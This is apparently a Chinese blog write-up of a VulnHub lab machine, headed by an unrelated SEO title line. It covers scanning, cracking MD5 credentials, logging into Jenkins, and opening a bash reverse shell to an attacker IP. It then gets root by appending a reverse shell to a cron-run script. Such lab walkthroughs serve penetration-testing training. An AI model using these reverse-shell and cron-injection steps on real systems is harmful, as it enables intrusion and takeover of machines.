施工企業(yè)準(zhǔn)則長沙官網(wǎng)seo技巧
🍬 博主介紹👨?🎓 博主介紹:大家好,我是 hacker-routing ,很高興認(rèn)識(shí)大家~
?主攻領(lǐng)域:【滲透領(lǐng)域】【應(yīng)急響應(yīng)】 【python】 【VulnHub靶場復(fù)現(xiàn)】【面試分析】
🎉點(diǎn)贊?評論?收藏 == 養(yǎng)成習(xí)慣(一鍵三連)😋
🎉歡迎關(guān)注💗一起學(xué)習(xí)👍一起討論??一起進(jìn)步📝文末有彩蛋
🙏作者水平有限,歡迎各位大佬指點(diǎn),相互學(xué)習(xí)進(jìn)步!
一、信息收集
1.nmap掃描
┌──(root💀kali)-[~/桌面]
└─# arp-scan -l
發(fā)現(xiàn)靶機(jī)IP:192.168.103.196
┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A 192.168.103.196/24
掃描發(fā)現(xiàn)22、80、3306、8080端口
┌──(root💀kali)-[~/桌面]
└─# nmap --script=vuln -p22,80,8080 192.168.103.196--script=vuln 是nmap中的一個(gè)模塊,能夠掃描端口中有哪些漏洞可以利用
先登錄下80端口:
沒有發(fā)現(xiàn)什么有價(jià)值的信息
再登錄下8080端口:
是個(gè)登錄界面
2.目錄掃描
1.掃描80端口
┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://192.168.103.196
/access.html目錄:
發(fā)現(xiàn)了一個(gè)頁面,好像是有幾串加密了的字符串
┌──(root💀kali)-[~/桌面]
└─# hash-identifier 5978a63b4654c73c60fa24f836386d87
發(fā)現(xiàn)是md5加密
解碼工具:
MD5免費(fèi)在線解密破解_MD5在線加密-SOMD5MD5在線免費(fèi)破解,支持md5,sha1,mysql,sha256,sha512,md4,織夢,vBulletin,Discuz,md5(Joomla),mssql(2012),ntlm,md5(base64),sha1(base64),md5(wordpress),md5(Phpbb3),md5(Unix),des(Unix)等數(shù)十種加密方式https://www.somd5.com/
解碼之后的結(jié)果是:
tiago:5978a63b4654c73c60fa24f836386d87:italia99trindade:9b38e2b1e8b12f426b0d208a7ab6cb98:mariannaeder:f463f63616cb3f1e81ce46b39f882fd5: vipsu
2.掃描8080端口
發(fā)現(xiàn)了8080端口下面有一個(gè)robots.txt目錄
并沒有發(fā)現(xiàn)什么有價(jià)值的信息
二、漏洞利用
1.jenkins漏洞
大家可以上網(wǎng)找下這個(gè)工具的一些漏洞
三個(gè)賬號(hào)密碼都試下,下面的是可以正常登陸進(jìn)去后臺(tái)的
賬號(hào):eder
密碼:vipsu
2.反彈shell
反彈shell木馬:
bash -i >& /dev/tcp/192.168.103.129/9999 0>&1
┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 9999
bash -i >& /dev/tcp/192.168.103.129/9999 0>&1
三、提權(quán)
1.信息收集
就root和eder(目前登錄的賬號(hào))有提權(quán)機(jī)會(huì)
bash-4.2$ cat /etc/passwd
沒有查看密碼的權(quán)限,這條路說明走不通
cat /etc/shadow
2.查看歷史進(jìn)程
cat /etc/crontab
說明我們可以追加一個(gè)木馬進(jìn)去,然后五分鐘可以反彈到root權(quán)限
echo "bash -i >& /dev/tcp/192.168.103.129/44 0>&1" >> /etc/script/CleaningScript.sh
可以看到反彈成功了
3.flag
大概就是說,恭喜你拿到了最高權(quán)限